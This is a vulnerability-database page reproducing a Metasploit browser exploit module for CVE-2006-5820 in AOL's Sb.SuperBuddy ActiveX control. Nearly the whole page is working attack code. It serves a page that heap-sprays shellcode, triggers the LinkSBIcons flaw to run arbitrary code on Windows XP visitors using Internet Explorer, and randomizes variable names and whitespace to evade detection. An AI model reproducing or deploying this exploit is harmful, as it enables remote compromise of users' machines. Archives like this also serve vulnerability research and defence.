Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

aol-activex.txt

Related Vulnerabilities: CVE-2006-5820  
Publish Date: 05 Apr 2007
Author: Krad Chad, leetpete
Source 
                							

                require 'msf/core'

module Msf

class Exploits::Windows::Browser::AOL_SuperBuddy_LinkSBIcons < Msf::Exploit::Remote

  include Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'AOL Sb.Superbuddy vulnerability',
      'Description'    => %q{
        This module exploits a flaw in AOL Sb.SuperBuddy. We stole this code from a pre-existing metasploit module.
      },
      'License'        => MSF_LICENSE,
      'Author'         => 
        [ 
          'kradchad',
          'leetpete'
        ],
      'Version'        => '0.1',
      'References'     => 
        [
          [ 'CVE', 'CVE-2006-5820']
        ],
      'Payload'        =>
        {
          'Space'          => 1024,
          'BadChars'       => "\x00",
  
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Windows XP SP0-SP2 / IE 6.0SP1 English', {'Ret' => 0x0c0c0c0c} ]
        ],
      'DefaultTarget'  => 0))
  end

  def autofilter
    false
  end
  
  def on_request_uri(cli, request)

    # Re-generate the payload
    return if ((p = regenerate_payload(cli)) == nil)

    # Encode the shellcode
    shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
    
    # Get a unicode friendly version of the return address
    addr_word  = [target.ret].pack('V').unpack('H*')[0][0,4]

    # Randomize the javascript variable names  
    var_buffer    = rand_text_alpha(rand(30)+2)
    var_shellcode = rand_text_alpha(rand(30)+2)
    var_unescape  = rand_text_alpha(rand(30)+2)
    var_x         = rand_text_alpha(rand(30)+2)
    var_i         = rand_text_alpha(rand(30)+2)
    var_tic       = rand_text_alpha(rand(30)+2)
    var_toc       = rand_text_alpha(rand(30)+2)
    
    # Randomize HTML data
    html          = rand_text_alpha(rand(30)+2)
    
    # Build out the message
    content = %Q|
<html>
<head>
  <script>
  try {
  
  var #{var_unescape}  = unescape ;
  var #{var_shellcode} = #{var_unescape}( "#{shellcode}" ) ;
  
  var #{var_buffer} = #{var_unescape}( "%u#{addr_word}" ) ;
  while (#{var_buffer}.length <= 0x100000) #{var_buffer}+=#{var_buffer} ;

  var #{var_x} = new Array() ;  
  for ( var #{var_i} =0 ; #{var_i} < 120 ; #{var_i}++ ) {
    #{var_x}[ #{var_i} ] =     
      #{var_buffer}.substring( 0 ,  0x100000 - #{var_shellcode}.length ) + #{var_shellcode} ;
  }
  
  
     var #{var_tic} = new ActiveXObject( 'Sb.SuperBuddy.1' );  
  try { #{var_tic}.LinkSBIcons( #{target.ret} ) ; } catch( e ) { }

  
  } catch( e ) { window.location = 'about:blank' ; }
  
  </script>
</head>
<body>
#{html}
</body>
</html>    
    |

    # Randomize the whitespace in the document
    content.gsub!(/\s+/) do |s|
      len = rand(100)+2
      set = "\x09\x20\x0d\x0a"
      buf = ''
      
      while (buf.length < len)
        buf << set[rand(set.length)].chr
      end
      
      buf
    end
    
    print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

    # Transmit the response to the client
    send_response_html(cli, content)
  end

end

end
<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started